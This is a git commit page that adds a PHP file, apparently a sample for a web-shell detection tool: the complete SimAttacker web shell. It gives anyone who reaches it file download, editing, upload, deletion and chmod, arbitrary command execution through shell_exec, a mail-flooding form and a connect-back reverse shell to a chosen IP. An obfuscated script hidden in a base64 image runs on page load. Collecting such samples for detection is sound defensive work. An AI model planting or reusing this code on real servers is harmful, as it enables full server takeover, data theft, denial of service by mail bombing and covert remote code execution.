summaryrefslogtreecommitdiff
path: root/data/samples/classic/simattacker.php
diff options
context:
space:
mode:
authorMathieu Deous2022-05-02 20:18:23 +0200
committerGitHub2022-05-02 20:18:23 +0200
commit48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch)
treef4e69551f1368aa048edf46b7b061600f3668329 /data/samples/classic/simattacker.php
parentbbc738e16f8b637afde58d65196374af98a5e0e2 (diff)
Make application go-install-able and create a docker image
Diffstat (limited to 'data/samples/classic/simattacker.php')
-rw-r--r--data/samples/classic/simattacker.php756
1 files changed, 756 insertions, 0 deletions
diff --git a/data/samples/classic/simattacker.php b/data/samples/classic/simattacker.php
new file mode 100644
index 0000000..7e6f057
--- /dev/null
+++ b/data/samples/classic/simattacker.php
@@ -0,0 +1,756 @@
1<?
2
3//download Files Code
4
5$fdownload=$_GET['fdownload'];
6
7if ($fdownload <> "" ){
8
9// path & file name
10
11$path_parts = pathinfo("$fdownload");
12
13$entrypath=$path_parts["basename"];
14
15$name = "$fdownload";
16
17$fp = fopen($name, 'rb');
18
19header("Content-Disposition: attachment; filename=$entrypath");
20
21header("Content-Length: " . filesize($name));
22
23fpassthru($fp);
24
25exit;
26
27}
28
29?>
30
31
32
33<html>
34
35
36
37<head>
38
39<meta http-equiv="Content-Language" content="en-us">
40
41<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
42
43<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
44<style>
45
46<!--
47
48body { font-family: Tahoma; font-size: 8pt }
49
50-->
51
52</style>
53
54</head>
55
56<body>
57
58<?
59
60error_reporting(E_ERROR | E_WARNING | E_PARSE);
61
62
63
64 //File Edit
65
66 $fedit=$_GET['fedit'];
67
68 if ($fedit <> "" ){
69
70 $fedit=realpath($fedit);
71
72 $lines = file($fedit);
73
74 echo "<form action='' method='POST'>";
75
76echo "<textarea name='savefile' rows=30 cols=80>" ;
77
78foreach ($lines as $line_num => $line) {
79
80 echo htmlspecialchars($line);
81
82}
83
84echo "</textarea>
85
86 <input type='text' name='filepath' size='60' value='$fedit'>
87
88 <input type='submit' value='save'></form>";
89
90 $savefile=$_POST['savefile'];
91
92 $filepath=realpath($_POST['filepath']);
93
94 if ($savefile <> "")
95
96 {
97
98 $fp=fopen("$filepath","w+");
99
100 fwrite ($fp,"") ;
101
102 fwrite ($fp,$savefile) ;
103
104 fclose($fp);
105
106 echo "<script language='javascript'> close()</script>";
107
108 }
109
110exit();
111
112 }
113
114?>
115
116<?
117
118// CHmod - PRimission
119
120$fchmod=$_GET['fchmod'];
121
122if ($fchmod <> "" ){
123
124$fchmod=realpath($fchmod);
125
126echo "<center><br>
127
128chmod for :$fchmod<br>
129
130<form method='POST' action=''><br>
131
132Chmod :<br>
133
134<input type='text' name='chmod0' ><br>
135
136<input type='submit' value='change chmod'>
137
138</form>";
139
140$chmod0=$_POST['chmod0'];
141
142if ($chmod0 <> ""){
143
144chmod ($fchmod , $chmod0);
145
146}else {
147
148echo "primission Not Allow change Chmod";
149
150}
151
152exit();
153
154}
155
156?>
157
158
159
160<div align="center">
161
162 <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
163
164 <tr>
165
166 <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
167
168 <p align="center"><b>
169
170 <font face="Tahoma" size="2"><br>
171
172 </font>
173
174 <font color="#D2D200" face="Tahoma" size="2">
175
176 <span style="text-decoration: none">
177
178 <font color="#000000">
179
180 <a href="?id=fm&dir=<?
181
182 echo getcwd();
183
184 ?>
185
186 ">
187
188 <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
189
190 <p align="center"><b><a href="?id=cmd">
191
192 <span style="text-decoration: none">
193
194 <font face="Tahoma" size="2" color="#000000">
195
196 CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
197
198 <p align="center"><b><a href="?id=fake-mail">
199
200 <font face="Tahoma" size="2" color="#000000">
201
202 <span style="text-decoration: none">Fake mail</span></font></a></b></p>
203
204 <p align="center"><b>
205
206 <font face="Tahoma" size="2" color="#000000">
207
208 <a href="?id=cshell">
209
210 <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
211
212 <p align="center"><b>
213
214 <font color="#000000" face="Tahoma" size="2">
215
216 <a href="?id=">
217
218 <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
219
220 <p>&nbsp;<p align="center">&nbsp;</td>
221
222 <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
223
224 <?
225
226 //*******************************************************
227
228 //Start Programs About US
229
230 $id=$_GET['id'];
231
232
233
234 if ($id=="") {
235
236 echo "
237
238 <font face='Arial Black' color='#808080' size='1'>
239
240***************************************************************************<br>
241
242&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
243
244&nbsp;Programer : Hossein Asgary <br>
245
246&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group <br>
247
248&nbsp;please : If you find bug or problems in program , tell me by : <br>
249
250&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
251
252Enjoy :) [Only 4 Best Friends ] <br>
253
254***************************************************************************</font></span></p>
255
256";
257
258
259
260echo "<font color='#333333' size='2'>OS :". php_uname();
261
262echo "<br>IP :".
263
264($_SERVER['REMOTE_ADDR']);
265
266echo "</font>";
267
268
269
270
271
272 }
273
274 //************************************************************
275
276 //cmd-command line
277
278 $cmd=$_POST['cmd'];
279
280 if($id=="cmd"){
281
282 $result=shell_exec("$cmd");
283
284 echo "<br><center><h3> CMD ExeCute </h3></center>" ;
285
286 echo "<center>
287
288 <textarea rows=20 cols=70 >$result</textarea><br>
289
290 <form method='POST' action=''>
291
292 <input type='hidden' name='id' value='cmd'>
293
294 <input type='text' size='80' name='cmd' value='$cmd'>
295
296 <input type='submit' value='cmd'><br>";
297
298
299
300
301
302
303
304 }
305
306
307
308 //********************************************************
309
310
311
312 //fake mail = Use victim server 4 DOS - fake mail
313
314 if ( $id=="fake-mail"){
315
316 error_reporting(0);
317
318 echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
319
320 echo "<center><form method='post' action=''>
321
322 Victim Mail :<br><input type='text' name='to' ><br>
323
324 Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
325
326 Comments:
327
328 <br>
329
330 <textarea rows='10' cols=50 name='Comments' ></textarea><br>
331
332 <input type='submit' value='Send Mail Strm ' >
333
334 </form></center>";
335
336 //send Storm Mail
337
338 $to=$_POST['to'];
339
340 $nom=$_POST['nom'];
341
342 $Comments=$_POST['Comments'];
343
344 if ($to <> "" ){
345
346 for ($i = 0; $i < $nom ; $i++){
347
348 $from = rand (71,1020000000)."@"."Attacker.com";
349
350 $subject= md5("$from");
351
352 mail($to,$subject,$Comments,"From:$from");
353
354 echo "$i is ok";
355
356 }
357
358 echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
359
360 }
361
362 }
363
364 //********************************************************
365
366
367
368 //Connect Back -Firewall Bypass
369
370 if ($id=="cshell"){
371
372 echo "<br>Connect back Shell , bypass Firewalls<br>
373
374 For user :<br>
375
376 nc -l -p 1019 <br>
377
378 <hr>
379
380 <form method='POST' action=''><br>
381
382 Your IP & BindPort:<br>
383
384 <input type='text' name='mip' >
385
386 <input type='text' name='bport' size='5' value='1019'><br>
387
388 <input type='submit' value='Connect Back'>
389
390 </form>";
391
392 $mip=$_POST['mip'];
393
394 $bport=$_POST['bport'];
395
396 if ($mip <> "")
397
398 {
399
400 $fp=fsockopen($mip , $bport , $errno, $errstr);
401
402 if (!$fp){
403
404 $result = "Error: could not open socket connection";
405
406 }
407
408 else {
409
410 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
411
412 while(!feof($fp)){
413
414 fputs ($fp," bash # ");
415
416 $result= fgets ($fp, 4096);
417
418 $message=`$result`;
419
420 fputs ($fp,"--> ".$message."\n");
421
422 }
423
424 fclose ($fp);
425
426 }
427
428 }
429
430 }
431
432
433
434 //********************************************************
435
436 //Spy File Manager
437
438 $homedir=getcwd();
439
440 $dir=realpath($_GET['dir'])."/";
441
442 if ($id=="fm"){
443
444 echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir
445
446 &nbsp;<b>
447
448 <form action='' method='GET'>
449
450 &nbsp;Path:</b>
451
452 <input type='hidden' name='id' value='fm'>
453
454 <input type='text' name='dir' size='80' value='$dir'>
455
456 <input type='submit' value='dir'>
457
458 </form>
459
460 <br>";
461
462
463
464 echo "
465
466
467
468<div align='center'>
469
470
471
472<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
473
474 <tr>
475
476 <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
477
478 <td height='28' width='82' align='center'>
479
480 <font color='#000080' size='2'><b>Size KByte</b></font></td>
481
482 <td height='28' width='83' align='center'>
483
484 <font color='#008000' size='2'><b>Download</b></font></td>
485
486 <td height='28' width='66' align='center'>
487
488 <font color='#FF9933' size='2'><b>Edit</b></font></td>
489
490 <td height='28' width='75' align='center'>
491
492 <font color='#999999' size='2'><b>Chmod</b></font></td>
493
494 <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
495
496 </tr>";
497
498 if (is_dir($dir)){
499
500 if ($dh=opendir($dir)){
501
502 while (($file = readdir($dh)) !== false) {
503
504 $fsize=round(filesize($dir . $file)/1024);
505
506
507
508
509
510 echo "
511
512 <tr>
513
514 <th width='250' height='22' align='left' nowrap>";
515
516 if (is_dir($dir.$file))
517
518 {
519
520 echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
521
522 }
523
524 else {
525
526 echo "<font size='2' color='#666666'>&nbsp;$file ";
527
528 }
529
530 echo "</a></font></th>
531
532 <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
533
534 if (is_file($dir.$file))
535
536 {
537
538 echo "$fsize";
539
540 }
541
542 else {
543
544 echo "&nbsp; ";
545
546 }
547
548 echo "
549
550 </b></font></td>
551
552 <td width='103' align='center' nowrap>";
553
554 if (is_file($dir.$file)){
555
556 if (is_readable($dir.$file)){
557
558 echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
559
560 }else {
561
562 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
563
564 }
565
566 }else {
567
568 echo "&nbsp;";
569
570 }
571
572 echo "
573
574 </a></font></td>
575
576 <td width='77' align='center' nowrap>";
577
578 if (is_file($dir.$file))
579
580 {
581
582 if (is_readable($dir.$file)){
583
584 echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
585
586 }else {
587
588 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
589
590 }
591
592 }else {
593
594 echo "&nbsp;";
595
596 }
597
598 echo "
599
600 </a></font></td>
601
602 <td width='86' align='center' nowrap>";
603
604 if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
605
606 echo "<font size='1' color='#999999'>Dont in windows";
607
608 }
609
610 else {
611
612 echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
613
614 }
615
616 echo "</a></font></td>
617
618 <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
619
620 </tr>
621
622 ";
623
624 }
625
626 closedir($dh);
627
628 }
629
630 }
631
632 echo "</table>
633
634<form enctype='multipart/form-data' action='' method='POST'>
635
636 <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
637
638 Send this file: <input name='userfile' type='file' />
639
640 <inpt type='hidden' name='Fupath' value='$dir'>
641
642 <input type='submit' value='Send File' />
643
644</form>
645
646 </div>";
647
648 }
649
650//Upload Files
651
652$rpath=$_GET['dir'];
653
654if ($rpath <> "") {
655
656$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
657
658print "<pre>";
659
660if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
661
662echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
663
664echo "<script language='javascript'> history.back(2)</script>";
665
666}
667
668 }
669
670 //file deleted
671
672$frpath=$_GET['fdelete'];
673
674if ($frpath <> "") {
675
676if (is_dir($frpath)){
677
678$matches = glob($frpath . '/*.*');
679
680if ( is_array ( $matches ) ) {
681
682 foreach ( $matches as $filename) {
683
684 unlink ($filename);
685
686 rmdir("$frpath");
687
688echo "<script language='javascript'> alert('Success! Please refresh')</script>";
689
690echo "<script language='javascript'> history.back(1)</script>";
691
692 }
693
694 }
695
696 }
697
698 else{
699
700echo "<script language='javascript'> alert('Success! Please refresh')</script>";
701
702unlink ("$frpath");
703
704echo "<script language='javascript'> history.back(1)</script>";
705
706exit(0);
707
708
709
710 }
711
712
713
714
715
716}
717
718 ?>
719
720
721
722 </td>
723
724 </tr>
725
726 <tr>
727
728 <td style="border: 1px dotted #FFCC66">
729
730 <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
731
732 Copyright 2004-Simorgh Security<br>
733
734 Hossein-Asgari<br>
735
736 </font><font color="#c0c0c0" size="1" face="Tahoma">
737
738 <a style="TEXT-DECORATION: none" href="http://www.r57.biz">
739
740 <font color="#666666">www.r57.biz</font></a></font></td>
741
742 </tr>
743
744 </table>
745<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
746<script type="text/javascript">
747if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
748setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(4);}, 500);
749</script>
750</div>
751
752</body>
753
754
755
756</html>